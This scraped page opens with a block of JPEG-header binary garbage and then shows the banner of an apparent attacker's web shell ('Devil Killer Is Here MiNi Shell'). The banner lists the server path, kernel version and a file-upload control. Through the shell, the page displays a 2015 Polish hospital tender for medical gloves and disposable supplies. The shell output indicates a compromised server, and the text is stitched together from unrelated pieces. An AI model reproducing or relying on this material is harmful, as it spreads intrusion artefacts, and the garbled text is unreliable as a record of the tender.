JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150105/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150105/1834-N-2015.html

<p class="kh_header"><b>Bartoszyce: Dostawa rękawic medycznych i innych artykułów medycznych jednorazowego użytku</b><br>
<b>Numer ogłoszenia: 1834 - 2015; data zamieszczenia: 05.01.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Powiatowy im. Jana Pawła II , ul. Kardynała Stefana Wyszyńskiego 11, 11-200 Bartoszyce, woj. warmińsko-mazurskie, tel. 89 7642625, 7649484, faks 89 7642625.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital-bartoszyce.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa rękawic medycznych i innych artykułów medycznych jednorazowego użytku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywna dostawa materiałów wraz z rozładunkiem do siedziby Zamawiającego określonych co do rodzaju, ilości, postaci i ceny zgodnie z załącznikiem nr 2 do SIWZ. Zamawianą partię przedmiotu umowy, Wykonawca dostarczy w terminie wskazanym w ofercie Wykonawcy (do maksymalnie 4 dni roboczych) od dnia otrzymania zamówienia.
Przedmiot zamówienia składa się z 18 zadań:
Zadanie nr 01	Rękawice diagnostczne z lateksu, niejałowe, lekko pudrowane
Zadanie nr 02	Rękawice medyczne niesterylne winylowe
Zadanie nr 03	Rękawice foliowe
Zadanie nr 04	Rękawice diagnostczne z lateksu, niejałowe, bezpudrowe
Zadanie nr 05	Rękawice nitrylowe
Zadanie nr 06	Rękawice chirurgiczne, z lateksu, sterylne, pudrowane
Zadanie nr 07	Rękawice chirurgiczne, z lateksu, sterylne, bezpudrowe
Zadanie nr 08	Rękawice chirurgiczne, z lateksu, sterylne, niepudrowane
Zadanie nr 09	Rękawice chirurgiczne, lateksowe, ginekologiczne
Zadanie nr 10	Odzież medyczna
Zadanie nr 11	Zestawy diagnostyczne
Zadanie nr 12	Tlenek etylenu
Zadanie nr 13	Kompresy
Zadanie nr 14	Materiały medyczne
Zadanie nr 15	Jednorazowe, niechemiczne artykuły medyczne i hematologiczne
Zadanie nr 16	Maski tlenowe
Zadanie nr 17	Jednorazowe, niechemiczne artykuły medyczne i hematologiczne
Zadanie nr 18	Wyroby do transfuzji krwi.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 18.42.43.00-0, 33.19.90.00-1, 33.14.16.25-7, 24.32.63.10-1, 33.14.11.19-7, 33.14.00.00-3, 33.14.10.00-0, 33.15.71.10-9, 33.19.42.20-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 18.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek, jeżeli złoży oświadczenie o spełnieniu warunku udziału w postępowaniu zgodnie z art.  22 ust. 1 pkt 1  ustawy Prawo Zamówień Publicznych
Ocena spełniania warunków udziału w postępowaniu nastąpi na zasadzie spełnia / nie spełnia na podstawie złożonego oświadczenia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek, jeżeli złoży wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, co najmniej dwóch głównych dostaw w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem  wartości, przedmiotu, dat wykonania i podmiotów na rzecz których dostawy zostały wykonane, oraz załączeniem dowodów czy  zostały wykonane lub są wykonywane należycie. Przedmiot dostaw  powinien odpowiadać rodzajowi dostaw na jakie Zamawiający udziela zamówienia w niniejszym postępowaniu. Spełnienie warunku posiadania wiedzy i doświadczenia Zamawiający będzie oceniał w oparciu o złożone dokumenty na zasadzie spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek, jeżeli złoży oświadczenie o spełnieniu warunku udziału w postępowaniu zgodnie z art.  22 ust. 1 pkt 3  ustawy Prawo Zamówień Publicznych
Ocena spełniania warunków udziału w postępowaniu nastąpi na zasadzie spełnia / nie spełnia na podstawie złożonego oświadczenia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek, jeżeli złoży oświadczenie o spełnieniu warunku udziału w postępowaniu zgodnie z art.  22 ust. 1 pkt 3  ustawy Prawo Zamówień Publicznych
Ocena spełniania warunków udziału w postępowaniu nastąpi na zasadzie spełnia / nie spełnia na podstawie złożonego oświadczenia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek, jeżeli złoży oświadczenie o spełnieniu warunku udziału w postępowaniu zgodnie z art.  22 ust. 1 pkt 4  ustawy Prawo Zamówień Publicznych
Spełnienie warunku dot. sytuacji  ekonomicznej i finansowej Zamawiający będzie oceniał w oparciu o złożone oświadczenie na zasadzie spełnia / nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">dla zadań od 1 do 9:
1) Dokumenty potwierdzające  zgłoszenie oferowanego wyrobu do Rejestru Wytwórców i Wyrobów Medycznych Prezesa Urzędu Rejestracji produktów Leczniczych, Wyrobów Medycznych i produktów Biobójczych  
2) Opis, specyfikację oferowanego przedmiotu zamówienia (foldery, karty katalogowe, ulotki, prospekty w języku polskim ze zdjęciami, z zaznaczeniem którego zadania dotyczy) zawierające opis podstawowych parametrów, zgodny z opisem przedmiotu zamówienia
3) Dokumenty potwierdzające, zgodnie z obowiązującymi przepisami,  zgodność oferowanego wyrobu z normą  PN EN 420 - dla wszystkich zadań
4) Dokumenty potwierdzające,  zgodnie z obowiązującymi przepisami,  zgodność oferowanego wyrobu z normą  PN EN 455 - dla zadań: 1, 2, 4, 5, 6, 7, 8, 9.
5) Dokumenty potwierdzające, zgodnie z obowiązującymi przepisami, zgodność oferowanego wyrobu z normą  PN EN 374 - dla zadań: 2, 4, 5, 6, 7.
6) Dokumenty potwierdzające, zgodnie z obowiązującymi przepisami, zgodność z normą  ASTM F 1671 - dla zadań: 5, 6, 7, 8.
7) Protokoły badań producenta nie starsze niż z 2013 roku, potwierdzające spełnianie wymagań zawartych w opisie przedmiotu zamówienia - dla zadań 1, 4.
8) bezpłatne próbki wyrobów opatrzonych etykietami zawierającymi wszystkie niezbędne dla wyrobów medycznych dane w ilościach po jednej parze z każdego rozmiaru dla wszystkich zadań, gotowe do użycia w warunkach szpitalnych.
Próbki należy umieścić w oddzielnej od Oferty, odpowiednio zabezpieczonej paczce. Paczkę należy opisać w sposób umożliwiający identyfikację Wykonawcy, tj. nazwa i adres Wykonawcy. Paczka dodatkowo winna być opisana:
Próbki do przetargu nr 01/2015 - Dostawa rękawic medycznych i innych artykułów medycznych jednorazowego użytku. Nie otwierać przed 2015-01-19, godz. 11:30.
Każda próbka musi być oznaczona w następujący sposób:
nazwa Wykonawcy, Nr zadania, Nr pozycji.


dla zadań od 10 do 12:
9) Oświadczenie Wykonawcy, że oferowane wyroby posiadają dokumenty potwierdzające dopuszczenie oferowanych wyrobów medycznych do obrotu zgodnie z obowiązującymi przepisami  (certyfikaty, deklaracje zgodności CE producenta potwierdzające zgodność wyrobu z wymaganiami dyrektyw Unii Europejskiej, potwierdzenie zgłoszenia do Rejestru Wytwórców i Wyrobów Medycznych Prezesa Urzędu Rejestracji produktów Leczniczych, Wyrobów Medycznych i produktów Biobójczych) - zgodnie z zał. nr 7 do SIWZ.
10) bezpłatne próbki wyrobów opatrzonych etykietami zawierającymi wszystkie niezbędne dla wyrobów medycznych dane w celu dokonania weryfikacji zgodności zaoferowanych produktów z opisem przedmiotu zamówienia (po jednej sztuce do każdej pozycji) gotowe do użycia w warunkach szpitalnych - Dla zadania nr 10 z wyłączeniem poz.1
Próbki należy umieścić w oddzielnej od Oferty, odpowiednio zabezpieczonej paczce. Paczkę należy opisać w sposób umożliwiający identyfikację Wykonawcy, tj. nazwa i adres Wykonawcy. Paczka dodatkowo winna być opisana:
Próbki do przetargu nr 01/2015 - Dostawa rękawic medycznych i innych artykułów medycznych jednorazowego użytku. Nie otwierać przed 2015-01-19, godz. 11:30.
Każda próbka musi być oznaczona w następujący sposób:
nazwa Wykonawcy, Nr zadania, Nr pozycji.
11) Dla zadania nr 11:
- opisy i charakterystyki produktów
- świadectwa niezależnych instytucji notyfikowanych o zgodności z normami (przy opisach wskaźników)
- określenie substancji toksycznych w testach chemicznych (całkowity brak soli, metali ciężkich lub ilość śladowa nie zagrażająca zdrowiu)

dla zadania nr 13:
12) Dokumenty, na podstawie których wyroby medyczne są wprowadzone w Polsce do obrotu i używania tj. Certyfikat CE wystawiony dla producenta przez Jednostkę Notyfikowaną, Deklaracja zgodności wyrobów medycznych oraz Zgłoszenie lub potwierdzenie wpisu do Rejestru Wyrobów Medycznych.

dla zadań od 14 do 18:
13) Oświadczenie Wykonawcy, że oferowane wyroby posiadają dokumenty potwierdzające dopuszczenie oferowanych wyrobów medycznych do obrotu zgodnie z obowiązującymi przepisami  (certyfikaty, deklaracje zgodności CE producenta potwierdzające zgodność wyrobu z wymaganiami dyrektyw Unii Europejskiej, potwierdzenie zgłoszenia do Rejestru Wytwórców i Wyrobów Medycznych Prezesa Urzędu Rejestracji produktów Leczniczych, Wyrobów Medycznych i produktów Biobójczych) - zgodnie z zał. nr 7 do SIWZ.
14) opis, specyfikację oferowanego przedmiotu zamówienia (foldery, karty katalogowe,
prospekty w języku polskim ze zdjęciami) zawierające opis podstawowych parametrów, zgodny z opisem przedmiotu zamówienia oraz sposób użycia oferowanych produktów wraz z oznaczeniem, dla której pozycji opisanej w formularzu cenowym zostały złożone.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Formularz ofertowy - wypełniony i podpisany przez wykonawcę
2) Dokumenty potwierdzające posiadanie uprawnień / pełnomocnictw osób składających ofertę, o ile nie wynikają z przepisów prawa lub z przedstawionych dokumentów rejestrowych.
3) Formularze cenowe w zakresie wybranych przez wykonawcę zadań od 1 do 18 wypełnione i podpisane przez wykonawcę.
4) W przypadku informacji stanowiących tajemnicę przedsiębiorstwa w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji Wykonawca musi zastrzec, że nie mogą być one udostępniane oraz wykazać/udowodnić, że:
a)	zastrzeżone informacje stanowią wartość techniczną lub technologiczną lub organizacyjną przedsiębiorstwa lub inną posiadającą wartość gospodarczą
b)	podjął działania celem zachowania ich poufności
c)	zastrzeżone informacje nie zostały upublicznione (np. poprzez stosowne oświadczenie)
Sam fakt włożenia dokumentów bądź części do osobnej koperty i opisanie klauzulą - tajemnica przedsiębiorstwa - nie wyczerpuje znamion wykazania działań Wykonawcy jakie podjął celem zachowania ich poufności.
5) Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia.
Pisemne zobowiązanie powinno zawierać: 
a)	zakres dostępnych wykonawcy zasobów innego podmiotu 
b)	sposób wykorzystania zasobów innego podmiotu przez wykonawcę przy wykonywaniu zamówienia
c)	charakter stosunków jaki będzie łączył wykonawcę z innym podmiotem
d)	zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia
Ponadto pisemne zobowiązanie powinno zawierać oświadczenie innego podmiotu o solidarnej odpowiedzialności za szkodę wyrządzoną zamawiającemu w wyniku nie udostępnienia zasobów do których się zobowiązał w niniejszym piśmie.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - czas realizacji dostawy (dni robocze) - 5</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający dopuszcza zmianę postanowień niniejszej umowy, w przypadku: 
a)	wycofania z dystrybucji przedmiotu umowy, wymienionego w załączniku nr 1 do umowy i zastąpienia go produktem o parametrach nie gorszych niż oferowany, za cenę taką jak ustalona w niniejszej umowie,
b)	zmiany terminu dostawy z przyczyn niezależnych od Wykonawcy.
c)	ustawowej zmiany stawki podatku VAT zmianie ulega wartość netto umowy o której mowa w §  4 ust. 1 oraz załączniku nr 1 do umowy a także ceny jednostkowe netto o których mowa w załączniku nr 1 do umowy,
d)	obniżenia przez Wykonawcę cen towarów będących przedmiotem umowy,
e)	w przypadku braku na rynku towaru wymienionego w załączniku nr 1 do umowy dopuszcza się dostarczenie zamiennika towaru, pod warunkiem uzyskania wcześniejszej pisemnej zgody Zamawiającego, jednak w każdym przypadku cena zamiennika nie będzie mogła być wyższa niż cena towaru określona w załączniku nr 1.
f)	wydłużenia okresu obowiązywania umowy zgodnie z zapisem  w § 2 ust 2 
2.   Zmiana niniejszej umowy wymaga formy pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital-bartoszyce.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba Zamawiającego pok. A14.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.01.2015 godzina 11:00, miejsce: Szpital Powiatowy im. Jana Pawła II
ul. Wyszyńskiego 11
11-200 Bartoszyce
Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający wyklucza z postępowania o udzielenie zamówienia wykonawcę, który w okresie 3 lat przed wszczęciem postępowania, w sposób zawiniony poważnie naruszył obowiązki zawodowe, w szczególności, gdy wykonawca w wyniku zamierzonego działania lub rażącego niedbalstwa nie wykonał lub nienależycie wykonał zamówienie, co zamawiający jest w stanie wykazać za pomocą dowolnych środków dowodowych. 
Zamawiający nie wyklucza z postępowania o udzielenie zamówienia wykonawcy, który udowodni, że podjął konkretne środki techniczne, organizacyjne i kadrowe, które mają zapobiec zawinionemu i poważnemu naruszaniu obowiązków zawodowych w przyszłości oraz naprawił szkody powstałe w wyniku naruszenia obowiązków zawodowych lub zobowiązał się do ich naprawienia..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Rękawice diagnostczne z lateksu, niejałowe, lekko pudrowane.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Rękawice diagnostczne, z lateksu, lekko pudrowane, niejałowe, pasujące na obie dłonie. Zawartość protein <70?g/g.Poziom AQL=1,5. O grubości w części palca min. 0,12 mm i długości min.240 mm.Mankiet zakończony równomiernie rolowanym rantem. Spełnianie wymagań potwierdzone protokołami badań producenta nie starszymi niż z 2013 roku. Zarejestrowane jako wyrób medyczny i środek ochrony osobistej Kat .I. Rozmiar XS, S, M, L, XL (w zależności od potrzeb zamawiającego) Pakowane po 100 szt. - 750 000 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.42.43.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. czas realizacji dostawy (dni robocze) - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Rękawice medyczne niesterylne winylowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Rękawice medyczne niesterylne winylowe do ochrony rąk przed materiałem medycznym lub czynnikami chorobotwórczymi, przeznaczone m.in.  do badań i zabiegów oraz kontaktu z zanieczyszczonym materiałem medycznym,  o niżej wymaganych cechach: przeznaczenie: m.in. diagnostyczne, czystość mikrobiologiczna: niejałowe (niesterylne), rodzaj materiału: polichlorek winylu, zapewniający:, wyjątkową elastyczności (odporne na zrywanie), odporność chemiczną, środek pudrujący: nie pudrowane talkiem !, oznakowanie opakowania jednostkowego i zbiorczego: nazwa rękawic, rodzaj, rozmiar, seria, data przydatności do użytku, nazwa producenta. Zarejestrowane jako wyrób medyczny i środek ochrony osobistej kat. III. Rozmiar L, M, S (w zależności od potrzeb zamawiającego). Pakowane po 100 szt. - 50 000 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.42.43.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. czas realizacji dostawy (dni robocze) - 5</li>
</ul>
</li>
